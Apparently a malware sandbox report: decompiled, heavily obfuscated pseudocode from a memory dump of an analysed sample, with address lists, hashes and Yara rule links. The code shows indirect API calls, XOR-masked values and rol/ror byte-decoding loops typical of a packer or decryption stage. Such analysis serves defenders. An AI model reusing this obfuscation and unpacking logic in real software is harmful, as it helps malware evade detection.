				 *_t384 =  *_t384 ^ _t248 + 0x0041830b;
				_t219 =  *((intOrPtr*)(_t248 + 0x45d018))(_v20);
				 *(_t248 + 0x418167) =  *(_t248 + 0x418167) & 0x00000000;
				 *(_t248 + 0x418167) =  *(_t248 + 0x418167) ^ _t261 ^ _v40 ^ _t219;
				_t264 = _t261;
				_push(_t219);
				_v40 =  *((intOrPtr*)(_t361 + 8));
				_t376 = _t374;
				if( *(_t248 + 0x4184bf) == 0) {
					_t219 =  *((intOrPtr*)(_t248 + 0x45d01c))();
					 *(_t248 + 0x4184bf) =  *(_t248 + 0x4184bf) & 0x00000000;
					 *(_t248 + 0x4184bf) =  *(_t248 + 0x4184bf) ^ (_t330 ^ _v44 | _t219);
					_t330 = _t330;
				}
				_push(_v20);
				_v44 = _t330;
				if( *((intOrPtr*)(_t248 + 0x4180c7)) == 0) {
					_v48 =  *((intOrPtr*)(_t248 + 0x418207));
					_v20 = _v20 & 0x00000000;
					_v52 = _v52 + _t330;
					_v16 = _v16 & 0x00000000;
					_v56 = _v56 | _t219;
					_t219 =  *((intOrPtr*)(_t248 + 0x45d03c))(_v16, _v20, _t264);
					 *_t60 = _t219;
					_push(_v20);
					_pop( *_t62);
				}
				 *_t64 =  *((intOrPtr*)(_t248 + 0x41823f));
				_push(_v12);
				_pop(_t265);
				if( *(_t248 + 0x418287) == 0) {
					_v16 = 0;
					_v48 = _v48 ^ _t265;
					_t219 =  *((intOrPtr*)(_t248 + 0x45d01c))(_v16);
					 *(_t248 + 0x418287) =  *(_t248 + 0x418287) & 0x00000000;
					 *(_t248 + 0x418287) =  *(_t248 + 0x418287) | _t265 & 0x00000000 | _t219;
					_t265 = _t265;
				}
				_t266 = _t265 + 0xfffffff0;
				_t333 = _t330;
				if( *(_t248 + 0x4182ef) == 0) {
					_v48 = _t266;
					_t219 =  *((intOrPtr*)(_t248 + 0x45d01c))(_v16);
					_v52 = _t376;
					 *(_t248 + 0x4182ef) = _t219;
					_t376 = 0;
					_pop(_t266);
				}
				_v20 = 0;
				_push(_v20);
				_v48 = _v48 | _t266;
				if( *(_t248 + 0x4184e7) == 0) {
					_v16 = 0;
					_v52 = _v52 | _t266;
					_v56 =  *((intOrPtr*)(_t248 + 0x418283));
					_v12 = 0;
					_v60 = _v60 ^ _t248;
					_v64 =  *((intOrPtr*)(_t248 + 0x41828f));
					_t238 =  *((intOrPtr*)(_t248 + 0x45d03c))(_t310, _v12, _t219, _v16);
					_v16 = _t266;
					 *(_t248 + 0x4184e7) =  *(_t248 + 0x4184e7) & 0x00000000;
					 *(_t248 + 0x4184e7) =  *(_t248 + 0x4184e7) ^ _t266 & 0x00000000 ^ _t238;
					_t266 = _t333;
				}
				do {
					asm("movsb");
					_t266 = _t266 - 1;
				} while (_t266 != 0);
				_pop(_t267);
				_pop(_t334);
				 *_t96 = _t334;
				_push(_v16);
				_pop(_t363);
				_v16 = 0;
				_push(_v16);
				_v44 = _v44 ^ _t248;
				do {
					_t220 =  *_t363 & 0x000000ff;
					_t363 = _t363 + 1;
					if(_t220 == 0) {
						goto L23;
					}
					_push(_t220);
					_v48 = _v48 - _t220;
					_v48 = _v48 ^ _t267;
					_push(_t248);
					_v52 = 1;
					_v12 = 0;
					_t310 = _t310 & 0x00000000 | 0 ^ _t363;
					_v8 = 8;
					do {
						asm("rol eax, cl");
						_t248 = _t220;
						_t220 = _t310;
						asm("ror ebx, cl");
						_t103 =  &_v8;
						 *_t103 = _v8 - 1;
					} while ( *_t103 != 0);
					_pop(_t267);
					_t220 = _t220 & 0x00000000 ^ _t334 ^ _v48 ^ _t248;
					_t334 = _t334;
					L23:
					asm("stosb");
					_t267 = _t267 - 1;
				} while (_t267 != 0);
				_pop(_t253);
				if( *(_t253 + 0x41854e) == 0) {
					_t220 =  *((intOrPtr*)(_t253 + 0x45d024))();
					 *(_t253 + 0x41854e) =  *(_t253 + 0x41854e) & 0x00000000;
					 *(_t253 + 0x41854e) =  *(_t253 + 0x41854e) ^ (_t267 ^ _v44 | _t220);
					_t267 = _t267;
				}
				if(_a4 != 0) {
					if( *((intOrPtr*)(_t253 + 0x4182e7)) == 0) {
						_v44 = _v44 + 8;
						_v44 = _v44 - _t363;
						_t113 = _t253 + 0x41835d; // 0x5000000
						_v48 =  *_t113;
						_t267 = _t267;
						_t115 = _t253 + 0x41807b; // 0xa000
						_t334 = _v52;
						_v52 =  *_t115;
						_t220 =  *((intOrPtr*)(_t253 + 0x45d040))(_t334, _t220, _t363);
						 *_t118 = _t220;
						_push(_v16);
						_pop( *_t120);
					}
					if(_a8 != 0) {
						if( *(_t253 + 0x4185b7) == 0) {
							_t123 = _t253 + 0x41804b; // 0x1010101
							_t363 = _v44;
							_v44 =  *_t123;
							_t125 = _t253 + 0x418067; // 0x2030408
							_v48 =  *_t125;
							_t310 = _t310;
							_t127 = _t253 + 0x4181c3; // 0x3044d
							_v52 =  *_t127;
							_t376 = _t376;
							_t220 =  *((intOrPtr*)(_t253 + 0x45d040))(_t220, _t334, _t363);
							_v12 = _t267;
							 *(_t253 + 0x4185b7) =  *(_t253 + 0x4185b7) & 0x00000000;
							 *(_t253 + 0x4185b7) =  *(_t253 + 0x4185b7) ^ _t267 & 0x00000000 ^ _t220;
							_t267 = _v12;
						}
						_v44 = _a4;
						_t323 = _t310;
						_t138 = _t253 + 0x4183a9; // 0x4183a9
						_v48 = _t138;
						_push( *((intOrPtr*)(_t253 + 0x45d018))(_v16, _t220));
						_pop( *_t141);
						_push(_v20);
						_pop( *_t143);
						_push(_t253);
						_v52 = _a8;
						_t253 = _t253;
						if( *(_t253 + 0x4185ab) == 0) {
							_t147 = _t253 + 0x4183b4; // 0x7
							_v56 =  *_t147;
							_t363 = _t363;
							_t149 = _t253 + 0x418613; // 0x300
							_v60 =  *_t149;
							_t267 = _t267;
							_v64 = _v64 & 0x00000000;
							_v64 = _v64 ^ _t323;
							_t234 =  *((intOrPtr*)(_t253 + 0x45d03c))(_t334, _t334, _t334);
							 *_t384 = _t323;
							 *(_t253 + 0x4185ab) = 0 ^ _t234;
							_t323 = 0;
						}
						_t220 = E002A1918(_t234, _t267, _t323, _t334, _t363);
						if( *((intOrPtr*)(_t253 + 0x4184db)) == 0) {
							_v48 = _v48 - _t253;
							_v48 = _v48 ^ _t323;
							_t154 = _t253 + 0x418389; // 0x4000000
							_v52 =  *_t154;
							_v56 = _v56 - _t363;
							_v56 = _v56 ^ _t323;
							_t156 = _t253 + 0x41852b; // 0x4100
							_t267 = _v60;
							_v60 =  *_t156;
							_t220 =  *((intOrPtr*)(_t253 + 0x45d044))(_v52, _t363, _t267, _t253);
							 *_t159 = _t220;
							_push(_v20);
							_pop( *_t161);
						}
					}
				}
				_pop(_t312);
				if( *(_t253 + 0x418318) == 0) {
					_v12 = 0;
					_v40 = _v40 | _t312;
					_t165 = _t253 + 0x418483; // 0xc800
					_v44 =  *_t165;
					_t167 = _t253 + 0x4181f3; // 0x786a000
					_t334 = _v48;
					_v48 =  *_t167;
					_v52 = _v52 ^ _t253;
					_v52 = _t363;
					_t169 = _t253 + 0x41815b; // 0x400
					_v56 =  *_t169;
					_t376 = _t376;
					_t171 = _t253 + 0x4183a1; // 0x6000000
					_v60 =  *_t171;
					_t267 = _t267;
					_t220 =  *((intOrPtr*)(_t253 + 0x45d048))(_t267, _t267, _t253, _t334, _t220, _v12);
					 *(_t253 + 0x418318) =  *(_t253 + 0x418318) & 0x00000000;
					 *(_t253 + 0x418318) =  *(_t253 + 0x418318) | _t312 & 0x00000000 ^ _t220;
					_t312 = _t312;
				}
				if(_t312 > 0) {
					if( *(_t253 + 0x4181af) == 0) {
						_v40 = _v40 + 0x400;
						_v40 = _v40 - _t253;
						_t179 = _t253 + 0x418478; // 0x0
						_v44 =  *_t179;
						_t181 = _t253 + 0x41811b; // 0x3044d
						_v48 =  *_t181;
						_t183 = _t253 + 0x418143; // 0x800
						_v52 =  *_t183;
						_v56 = _v56 & 0x00000000;
						_v56 = _v56 ^ _t253;
						_t230 =  *((intOrPtr*)(_t253 + 0x45d048))(_t220, _t363, _t267, _t376, _t312, _t253);
						 *(_t253 + 0x4181af) =  *(_t253 + 0x4181af) & 0x00000000;
						 *(_t253 + 0x4181af) =  *(_t253 + 0x4181af) | _t312 & 0x00000000 ^ _t230;
						_t312 = _t312;
					}
					_v16 = _t253;
					_t339 = _t334 & 0x00000000 | _t253 & 0x00000000 | _a4;
					_push(_v12);
					_v40 = _t339;
					_push(0);
					_v44 = _t312;
					_v44 = 0 ^  *(_t339 + 4);
					_t221 =  *(_t339 + 8);
					_t272 = 0;
					_v16 = _v16 & 0x00000000;
					_push(_v16);
					_v44 = _v44 | _t272;
					_v16 = _v16 & 0x00000000;
					_push(_v16);
					_v48 = _v48 ^ _t272;
					 *_t202 = _t221;
					_push(_v12);
					_pop(_t316);
					_push(_a8);
					_pop( *_t205);
					_push(_v12);
					_pop(_t365);
					_push(_v48);
					_v52 = _v52 - _t316;
					_pop(_t274);
					_t366 = _t365 + _t274;
					_v16 = _t221;
					_t276 = _t274 & 0x00000000 | _t221 ^ _v16 ^  *(_t339 + 8);
					_t225 = memcpy(_t339, _t366, _t276);
					_v12 = _t225;
					_t368 = _t366 & 0x00000000 ^ (_t225 ^ _v12 | _a8);
					_pop(_t278);
					_push(_t366 + _t276 + _t276);
					_t279 = _t278 - _t316;
					_pop(_t344);
					memcpy(_t344, _t368, _t279);
					_push(0);
					_pop(_t369);
					_t220 = memcpy(_t368 + _t279 + _t279 & 0x00000000 ^ 0x0 ^ _v48 ^ _a8, _t369, 0);
				}
				return _t220;
			}

0x002a4859
0x002a4859
0x002a4859
0x002a4859
0x002a4859
0x002a4866
0x002a4868
0x002a486e
0x002a4874
0x002a487b
0x002a4881
0x002a4881
0x002a4883
0x002a4887
0x002a4890
0x002a4897
0x002a489a
0x002a48a6
0x002a48ad
0x002a48b3
0x002a48b4
0x002a48b7
0x002a48c1
0x002a48c3
0x002a48cf
0x002a48d6
0x002a48dc
0x002a48dc
0x002a48e7
0x002a48e9
0x002a48f1
0x002a48fa
0x002a48fa
0x002a4905
0x002a4909
0x002a490d
0x002a4910
0x002a4918
0x002a491f
0x002a4925
0x002a4925
0x002a4930
0x002a4932
0x002a4939
0x002a4943
0x002a4946
0x002a4952
0x002a4959
0x002a495f
0x002a4960
0x002a4965
0x002a4969
0x002a4971
0x002a4973
0x002a497f
0x002a4986
0x002a498c
0x002a498c
0x002a498d
0x002a4990
0x002a499a
0x002a49a3
0x002a49a6
0x002a49ad
0x002a49b0
0x002a49b7
0x002a49ba
0x002a49c1
0x002a49c4
0x002a49c7
0x002a49c7
0x002a49d3
0x002a49d6
0x002a49d9
0x002a49e1
0x002a49e3
0x002a49ed
0x002a49f0
0x002a49fc
0x002a4a03
0x002a4a0a
0x002a4a0a
0x002a4a14
0x002a4a16
0x002a4a1e
0x002a4a23
0x002a4a26
0x002a4a2e
0x002a4a35
0x002a4a3b
0x002a4a3c
0x002a4a3c
0x002a4a3d
0x002a4a44
0x002a4a47
0x002a4a51
0x002a4a53
0x002a4a5d
0x002a4a67
0x002a4a6a
0x002a4a74
0x002a4a7f
0x002a4a84
0x002a4a8a
0x002a4a92
0x002a4a99
0x002a4aa2
0x002a4aa2
0x002a4aa5
0x002a4aa5
0x002a4aa6
0x002a4aa6
0x002a4aa9
0x002a4aaa
0x002a4aac
0x002a4aaf
0x002a4ab2
0x002a4ab3
0x002a4aba
0x002a4abd
0x002a4ac0
0x002a4ac0
0x002a4ac3
0x002a4ac6
0x00000000
0x00000000
0x002a4ac8
0x002a4ac9
0x002a4acc
0x002a4acf
0x002a4ad0
0x002a4add
0x002a4ae8
0x002a4aed
0x002a4af4
0x002a4af4
0x002a4af6
0x002a4af8
0x002a4afa
0x002a4afc
0x002a4afc
0x002a4afc
0x002a4b01
0x002a4b0b
0x002a4b0d
0x002a4b0e
0x002a4b0e
0x002a4b0f
0x002a4b0f
0x002a4b12
0x002a4b1a
0x002a4b1c
0x002a4b28
0x002a4b2f
0x002a4b35
0x002a4b35
0x002a4b3a
0x002a4b47
0x002a4b4a
0x002a4b4e
0x002a4b53
0x002a4b59
0x002a4b5d
0x002a4b5f
0x002a4b65
0x002a4b65
0x002a4b68
0x002a4b6f
0x002a4b72
0x002a4b75
0x002a4b75
0x002a4b7f
0x002a4b8c
0x002a4b8f
0x002a4b95
0x002a4b95
0x002a4b9a
0x002a4ba0
0x002a4ba4
0x002a4ba7
0x002a4bad
0x002a4bb1
0x002a4bb2
0x002a4bb8
0x002a4bc0
0x002a4bc7
0x002a4bcd
0x002a4bcd
0x002a4bd5
0x002a4bd9
0x002a4bda
0x002a4be3
0x002a4bec
0x002a4bed
0x002a4bf0
0x002a4bf3
0x002a4bf9
0x002a4bfe
0x002a4c02
0x002a4c0a
0x002a4c0e
0x002a4c14
0x002a4c18
0x002a4c1b
0x002a4c21
0x002a4c25
0x002a4c27
0x002a4c2b
0x002a4c2e
0x002a4c36
0x002a4c3d
0x002a4c43
0x002a4c43
0x002a4c44
0x002a4c50
0x002a4c53
0x002a4c56
0x002a4c5a
0x002a4c60
0x002a4c64
0x002a4c67
0x002a4c6b
0x002a4c71
0x002a4c71
0x002a4c74
0x002a4c7b
0x002a4c7e
0x002a4c81
0x002a4c81
0x002a4c50
0x002a4b7f
0x002a4c87
0x002a4c8f
0x002a4c91
0x002a4c9b
0x002a4c9f
0x002a4ca5
0x002a4ca9
0x002a4caf
0x002a4caf
0x002a4cb3
0x002a4cb6
0x002a4cbb
0x002a4cc1
0x002a4cc5
0x002a4cc8
0x002a4cce
0x002a4cd2
0x002a4cd3
0x002a4cdf
0x002a4ce6
0x002a4ced
0x002a4ced
0x002a4cf1
0x002a4cfe
0x002a4d01
0x002a4d08
0x002a4d0d
0x002a4d13
0x002a4d19
0x002a4d1f
0x002a4d23
0x002a4d29
0x002a4d2d
0x002a4d31
0x002a4d34
0x002a4d40
0x002a4d47
0x002a4d4d
0x002a4d4d
0x002a4d4e
0x002a4d5a
0x002a4d5f
0x002a4d62
0x002a4d65
0x002a4d67
0x002a4d74
0x002a4d7c
0x002a4d7e
0x002a4d7f
0x002a4d83
0x002a4d86
0x002a4d89
0x002a4d8d
0x002a4d90
0x002a4d94
0x002a4d97
0x002a4d9a
0x002a4d9b
0x002a4d9e
0x002a4da1
0x002a4da4
0x002a4da8
0x002a4da9
0x002a4dac
0x002a4dad
0x002a4daf
0x002a4dbb
0x002a4dc0
0x002a4dc2
0x002a4dce
0x002a4dd3
0x002a4dd4
0x002a4dd9
0x002a4ddb
0x002a4ddc
0x002a4dde
0x002a4dec
0x002a4ded
0x002a4ded
0x002a4df2

Memory Dump Source

Source File: 00000006.00000002.2504141033.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true

Associated: 00000006.00000002.2504161357.00000000002B8000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2504170151.00000000002FD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f89cbf176f5ded8dd9f870f15b95a5ce55e929d63621d25e61daa38bc8d58fc1
Instruction ID: 8828acdc2e2d15c7f7aada88c5276e9dff252e2491cda51aac4bb270b181caa7
Opcode Fuzzy Hash: f89cbf176f5ded8dd9f870f15b95a5ce55e929d63621d25e61daa38bc8d58fc1
Instruction Fuzzy Hash: 5E129072904604EFFF149F60C8857AEBBF5FF84725F0884ADEC899A185DB785560CB28

Uniqueness

Uniqueness Score: -1.00%

Function 002A1918, Relevance: .5, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E002A1918(signed int __eax, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t266;
				signed int _t267;
				signed int _t270;
				void* _t272;
				signed int _t275;
				signed int _t279;
				signed int _t283;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				void* _t294;
				signed int _t297;
				signed int _t299;
				signed int _t300;
				void* _t303;
				void* _t305;
				signed int _t306;
				signed int _t308;
				int _t310;
				void* _t313;
				signed int _t319;
				signed int _t324;
				signed int _t332;
				void* _t340;
				signed int _t342;
				signed int _t344;
				signed int _t347;
				signed int _t352;
				signed int _t361;
				signed int _t363;
				void* _t366;
				void* _t380;
				signed int _t385;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t401;
				void* _t416;
				signed int _t417;
				void* _t429;
				signed int _t431;
				void* _t432;
				signed int* _t435;

				_t306 = __ecx;
				_t259 = __eax;
				_push(_t300);
				 *_t431 =  *_t431 ^ _t300;
				 *_t431 =  *_t431 + _t416;
				_t417 = _t431;
				_t432 = _t431 + 0xffffffdc;
				_push(_v40);
				_v44 = _t300;
				_push(__edx);
				_t361 = __edi & 0x00000000 | __edx ^ _v48 | _a8;
				_pop(_t340);
				_v48 =  *((intOrPtr*)(_t361 + 0xc));
				_pop(_t385);
				 *_t5 = _t300;
				_t342 = _v48;
				_v48 =  *((intOrPtr*)(_t361 + 4));
				 *_t8 = _t340;
				if(_v24 == 1) {
					_v20 = 7;
					_v28 = 1;
					_v16 = 8;
				}
				if(_v24 != 0) {
					if(_v24 != 2) {
						if(_v24 == 4) {
							_v20 = 1;
							_v28 = 0x55;
							_v16 = 2;
						}
					} else {
						_v20 = 3;
						_v28 = 0x11;
						_v16 = 4;
					}
					_push(_t342);
					_v48 = _v48 ^ _t342;
					_v36 = _t385;
					_t261 = _t259 & 0x00000000 | _t385 & 0x00000000 ^ _v8;
					_t262 = _t261 / _v16;
					_t344 = _t261 % _v16;
					_push(_v8);
					_v48 = _v48 - _t344;
					_pop( *_t132);
					_v48 = _v36;
					_v12 = _t344;
					_t391 = 0;
					_v40 = _t344;
					_t393 = _t391 & 0x00000000 ^ (_t344 & 0x00000000 | _a4);
					_t347 = _v40;
					_push(_t347);
					_t363 = _t361 & 0x00000000 ^ (_t347 & 0x00000000 | _t393);
					_t394 = _t393 - 1;
					_v32 = 0;
					_push(_v32);
					_v48 = _v48 + _t300;
					do {
						_v40 = _t300;
						_t308 = _t306 & 0x00000000 ^ (_t300 & 0x00000000 | _t363);
						_t300 = _v40;
						_t306 = _t308 & _v20;
						if(_t306 == 0) {
							_t394 = _t394 + 1;
							_v32 = _t363;
							_t262 = _t262 & 0x00000000 ^ (_t363 & 0x00000000 | _v16);
							_t363 = _v32;
							_t300 =  *(_t262 + _t394) & 0x000000ff;
						}
						_v52 = _t394;
						_t394 = 0;
						asm("rol edx, cl");
						_t352 = (0 ^ _v28) & _t300;
						asm("lodsb");
						_t262 = _t262 | _t352;
						 *_t363 = _t262;
						_t363 = _t363 + 1;
						_t147 =  &_v8;
						 *_t147 = _v8 - 1;
					} while ( *_t147 != 0);
					_pop(_t303);
					if( *(_t303 + 0x4182ab) == 0) {
						_t150 = _t303 + 0x4181ff; // 0x13001300
						_v48 =  *_t150;
						_t319 = _t306;
						_t152 = _t303 + 0x41843c; // 0x6
						_v52 =  *_t152;
						_t352 = _t352;
						_t154 = _t303 + 0x418293; // 0x2030408
						_v56 =  *_t154;
						_t262 =  *((intOrPtr*)(_t303 + 0x45d040))(_t262, _t417, _t352);
						_v32 = _t319;
						 *(_t303 + 0x4182ab) =  *(_t303 + 0x4182ab) & 0x00000000;
						 *(_t303 + 0x4182ab) =  *(_t303 + 0x4182ab) ^ _t319 & 0x00000000 ^ _t262;
						_t306 = _v32;
					}
					if( *(_t303 + 0x4183d4) == 0) {
						if( *(_t303 + 0x418037) == 0) {
							_t165 = _t303 + 0x41816f; // 0x400
							_v48 =  *_t165;
							_v52 = _t394;
							_v56 = _v56 & 0x00000000;
							_v56 = _v56 | _t352;
							_t168 = _t303 + 0x41859f; // 0x400
							_v60 =  *_t168;
							_t352 = _t352;
							_t170 = _t303 + 0x41808b; // 0x5000
							_v64 =  *_t170;
							_t394 = _t394;
							_t279 =  *((intOrPtr*)(_t303 + 0x45d048))(_t306, _t352, _t303, _v36, _t262);
							_v40 = _t306;
							 *(_t303 + 0x418037) = 0 ^ _t279;
							_t306 = _v40;
						}
						_t262 =  *((intOrPtr*)(_t303 + 0x45d01c))();
						if( *((intOrPtr*)(_t303 + 0x4181f7)) == 0) {
							_v32 = _v32 & 0x00000000;
							_v48 = _v48 | _t262;
							_t181 = _t303 + 0x418438; // 0x4
							_v52 =  *_t181;
							_t394 = _t394;
							_v56 = _v56 & 0x00000000;
							_v56 = _v56 ^ _t363;
							_v36 = 0;
							_v60 = _v60 + _t432;
							_push( *((intOrPtr*)(_t303 + 0x45d040))(_v36, _t352, _t262, _v32));
							_pop( *_t186);
							_push(_v36);
							_pop( *_t188);
							_pop(_t262);
						}
						_v48 = _t417;
						 *(_t303 + 0x4183d4) = 0 ^ _t262;
						_t417 = 0;
						if( *(_t303 + 0x418450) == 0) {
							_t191 = _t303 + 0x418567; // 0x400
							_t352 = _v48;
							_v48 =  *_t191;
							_t193 = _t303 + 0x4183bc; // 0x7
							_v52 =  *_t193;
							_t195 = _t303 + 0x4180bb; // 0x500
							_v56 =  *_t195;
							_t197 = _t303 + 0x418513; // 0x900
							_t417 = _v60;
							_v60 =  *_t197;
							_t262 =  *((intOrPtr*)(_t303 + 0x45d044))(_v52, _t394, _t417, _t352);
							_v36 = _v56;
							 *(_t303 + 0x418450) = 0 ^ _t262;
							_t394 = _v36;
						}
					}
					_t310 = _t306 & 0x00000000 ^ _t363 & 0x00000000 ^ _v12;
					_t366 = _t363;
					if( *(_t303 + 0x41803b) == 0) {
						_v36 = 0;
						_v48 = _v48 | _t310;
						_t207 = _t303 + 0x418057; // 0x101b2908
						_t401 = _v52;
						_v52 =  *_t207;
						_t209 = _t303 + 0x418028; // 0x1
						_t352 = _v56;
						_v56 =  *_t209;
						_t211 = _t303 + 0x4183e8; // 0x8020304
						_v60 =  *_t211;
						_t272 = _t262;
						_t213 = _t303 + 0x4185ef; // 0x101b294d
						_v64 =  *_t213;
						_t275 =  *((intOrPtr*)(_t303 + 0x45d044))(_t417, _t352, _t394, _v36);
						 *(_t303 + 0x41803b) =  *(_t303 + 0x41803b) & 0x00000000;
						 *(_t303 + 0x41803b) =  *(_t303 + 0x41803b) ^ _t401 & 0x00000000 ^ _t275;
						_t394 = _t401;
						_t310 = _t272;
					}
					if( *(_t303 + 0x41849f) == 0) {
						if( *(_t303 + 0x41861f) == 0) {
							_v48 = _t310;
							_t270 =  *((intOrPtr*)(_t303 + 0x45d01c))(_v36);
							_v36 = _t366;
							 *(_t303 + 0x41861f) = 0 ^ _t270;
							_t366 = _v36;
							_pop(_t310);
						}
						_v40 = _v40 & 0x00000000;
						_v48 = _v48 + _t310;
						_t230 = _t303 + 0x418533; // 0x418533
						_v52 = _v52 ^ _t417;
						_v52 = _v52 ^ _t230;
						_t266 =  *((intOrPtr*)(_t303 + 0x45d018))(_t417, _v40);
						_v36 = _t366;
						 *(_t303 + 0x4185cf) = 0 ^ _t266;
						_t366 = _v36;
						_push(_t352);
						_t235 = _t303 + 0x418243; // 0x500
						_v56 =  *_t235;
						_t313 = _t310;
						if( *((intOrPtr*)(_t303 + 0x41862b)) == 0) {
							_t238 = _t303 + 0x418414; // 0x4
							_v60 =  *_t238;
							_t240 = _t303 + 0x4183cc; // 0x1010101
							_v64 =  *_t240;
							_t417 = _t417;
							_push( *((intOrPtr*)(_t303 + 0x45d03c))(_t432, _t266, _t313, _t366));
							_pop( *_t243);
							_push(_v36);
							_pop( *_t245);
						}
						_push(_t352);
						_t246 = _t303 + 0x41814b; // 0x300
						_v60 =  *_t246;
						if( *((intOrPtr*)(_t303 + 0x41851b)) == 0) {
							 *_t250 =  *((intOrPtr*)(_t303 + 0x45d024))();
							_push(_v32);
							_pop( *_t252);
						}
						_t253 = _t303 + 0x4182a7; // 0x13001300
						_t417 = _v64;
						_v64 =  *_t253;
						_t267 =  *((intOrPtr*)(_t303 + 0x45d040))();
						_v36 = _t394;
						 *(_t303 + 0x41849f) = 0 ^ _t267;
						_t394 = _v36;
						_t310 = _t417;
					}
					return memcpy(_t366, _t394 + 1, _t310);
				} else {
					_pop(_t305);
					if( *(_t305 + 0x418627) == 0) {
						_v44 =  *((intOrPtr*)(_t305 + 0x4182e3));
						_t299 = _t259;
						_v48 =  *((intOrPtr*)(_t305 + 0x4184b3));
						_t429 = _t417;
						_v52 =  *((intOrPtr*)(_t305 + 0x41802f));
						_t417 = _t429;
						_v32 = 0;
						_v56 = _v56 ^ _t299;
						_v60 =  *((intOrPtr*)(_t305 + 0x418470));
						_t380 = _t361;
						_t259 =  *((intOrPtr*)(_t305 + 0x45d048))(_t361, _v32, _t306, _t417, _t342);
						 *(_t305 + 0x418627) =  *(_t305 + 0x418627) & 0x00000000;
						 *(_t305 + 0x418627) =  *(_t305 + 0x418627) ^ (_t380 - _v64 | _t259);
						_t361 = _t380;
					}
					if( *(_t305 + 0x418077) == 0) {
						if( *(_t305 + 0x418517) == 0) {
							_v44 =  *((intOrPtr*)(_t305 + 0x4182ff));
							_t294 = _t259;
							_v48 =  *((intOrPtr*)(_t305 + 0x41810b));
							_t417 = _t417;
							_v52 =  *((intOrPtr*)(_t305 + 0x418217));
							_t361 = _v56;
							_v56 =  *(_t305 + 0x418173);
							_v60 =  *(_t305 + 0x418546);
							_t385 = _t385;
							_t297 =  *((intOrPtr*)(_t305 + 0x45d048))(_v52, _t361, _t294, _t385, _t306);
							_v32 = _t306;
							 *(_t305 + 0x418517) =  *(_t305 + 0x418517) & 0x00000000;
							 *(_t305 + 0x418517) =  *(_t305 + 0x418517) ^ (_t306 & 0x00000000 | _t297);
							_t306 = _v32;
						}
						_t288 =  *((intOrPtr*)(_t305 + 0x45d020))();
						_v44 = _v44 & 0x00000000;
						_v44 = _v44 ^ _t288;
						_v36 = _v36 & 0x00000000;
						_v48 = _v48 + _t305 + 0x4185c7;
						_t290 =  *((intOrPtr*)(_t305 + 0x45d018))(_v36, _t305);
						 *(_t305 + 0x418010) =  *(_t305 + 0x418010) & 0x00000000;
						 *(_t305 + 0x418010) =  *(_t305 + 0x418010) ^ (_t306 & 0x00000000 | _t290);
						_t332 = _t306;
						_pop(_t291);
						_v40 = _t332;
						 *(_t305 + 0x418077) =  *(_t305 + 0x418077) & 0x00000000;
						 *(_t305 + 0x418077) =  *(_t305 + 0x418077) | _t332 - _v40 ^ _t291;
						_t306 = _v40;
						if( *(_t305 + 0x418400) == 0) {
							_t292 =  *((intOrPtr*)(_t305 + 0x45d020))();
							_v36 = _t385;
							 *(_t305 + 0x418400) =  *(_t305 + 0x418400) & 0x00000000;
							 *(_t305 + 0x418400) =  *(_t305 + 0x418400) | _t385 & 0x00000000 | _t292;
							_t385 = _v36;
						}
					}
					_t435 = _t417;
					 *_t435 =  *_t435 - _t342;
					 *_t435 =  *_t435 | _t305 + 0x0041804f;
					_t283 =  *((intOrPtr*)(_t305 + 0x45d018))(_t342);
					_v36 = _t361;
					 *(_t305 + 0x41800c) =  *(_t305 + 0x41800c) & 0x00000000;
					 *(_t305 + 0x41800c) =  *(_t305 + 0x41800c) ^ _t361 & 0x00000000 ^ _t283;
					if( *(_t305 + 0x418365) == 0) {
						_v40 = _v40 & 0x00000000;
						_v44 = _v44 + _t305 + 0x41802c;
						_t285 =  *((intOrPtr*)(_t305 + 0x45d018))(_v40);
						_v48 = _t306;
						 *(_t305 + 0x4180e3) = 0 ^ _t285;
						_t324 = 0;
						_t283 =  *((intOrPtr*)(_t305 + 0x45d024))();
						if( *(_t305 + 0x4183fc) == 0) {
							_v32 = _v32 & 0x00000000;
							_v48 = _v48 ^ _t283;
							_t287 =  *((intOrPtr*)(_t305 + 0x45d020))(_v32);
							 *(_t305 + 0x4183fc) =  *(_t305 + 0x4183fc) & 0x00000000;
							 *(_t305 + 0x4183fc) =  *(_t305 + 0x4183fc) ^ (_t324 - _v52 | _t287);
							_t324 = _t324;
							_pop(_t283);
						}
						_v40 = _t324;
						 *(_t305 + 0x418365) =  *(_t305 + 0x418365) & 0x00000000;
						 *(_t305 + 0x418365) =  *(_t305 + 0x418365) | _t324 & 0x00000000 ^ _t283;
						if( *(_t305 + 0x41853e) == 0) {
							_t286 =  *((intOrPtr*)(_t305 + 0x45d020))();
							_v36 = _t385;
							 *(_t305 + 0x41853e) =  *(_t305 + 0x41853e) & 0x00000000;
							 *(_t305 + 0x41853e) =  *(_t305 + 0x41853e) | _t385 ^ _v36 ^ _t286;
							return _t286;
						}
					}
					return _t283;
				}
			}

0x002a1918
0x002a1918
0x002a1918
0x002a1919
0x002a191c
0x002a191f
0x002a1921
0x002a1924
0x002a1927
0x002a192a
0x002a1934
0x002a1936
0x002a193c
0x002a1940
0x002a1941
0x002a1948
0x002a1948
0x002a194b
0x002a1952
0x002a1954
0x002a195b
0x002a1962
0x002a1962
0x002a196d
0x002a1c7c
0x002a1c99
0x002a1c9b
0x002a1ca2
0x002a1ca9
0x002a1ca9
0x002a1c7e
0x002a1c7e
0x002a1c85
0x002a1c8c
0x002a1c8c
0x002a1cb0
0x002a1cb1
0x002a1cb5
0x002a1cc1
0x002a1cc6
0x002a1cc6
0x002a1cc9
0x002a1ccc
0x002a1ccf
0x002a1cd4
0x002a1cdb
0x002a1cde
0x002a1cdf
0x002a1ceb
0x002a1ced
0x002a1cf0
0x002a1cf9
0x002a1cfc
0x002a1cfd
0x002a1d04
0x002a1d07
0x002a1d0a
